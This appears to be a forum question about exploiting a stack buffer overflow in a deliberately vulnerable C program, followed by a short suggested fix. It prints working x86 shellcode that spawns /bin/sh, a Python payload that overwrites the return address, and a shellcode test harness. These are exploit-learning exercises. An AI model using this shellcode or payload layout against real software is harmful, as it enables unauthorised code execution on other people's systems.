I have been trying to exploit simple buffer overflow caused by scanf. I'm working on x86 Linux. The point is to spawn a shell. I sucesfully overwritten return address and jumped into my shellcode. But when it executes some strange thing occurs that i can't understand. The code that I'am working on is taken from here: https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
Compilation: gcc -fno-stack-protector -z execstack -o vuln vuln.c -m32
ASLR is disabled too. Code:
#include <stdio.h>
void secretFunction()
{
printf("Congratulations!\n");
printf("You have entered in the secret function!\n");
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
I try to exploit it using this payload: python -c "print '\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80' + '\x41' * 3 + '\x42' * 4+ '\x8c\xd6\xff\xff' " shellcode(25) + padding(3) + ebp(4) + return(4) Where the last part is return address. It succesfully jumps to my shellcode.
Here is the assembly view of shellcode (after returning to overwritten address). I step instructions one by one up to mov %esp, %ecx(0xffffd69d)
And then when i try to execute mov %esp, %ecx it goes one byte too close. EIP should point 0xffffd69f but it doesn't.
I tested shellcode separately and it worked.
int main()
{
char buf[] = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80";
((void (*)())(buf))();
return 0;
}
What I did wrong that it doesnt't work?
EDIT: Had to update all pictures, Registers dump before 'mov %esp,%ecx'
sub esp, 0x78
to the start of the shellcode should solve the problem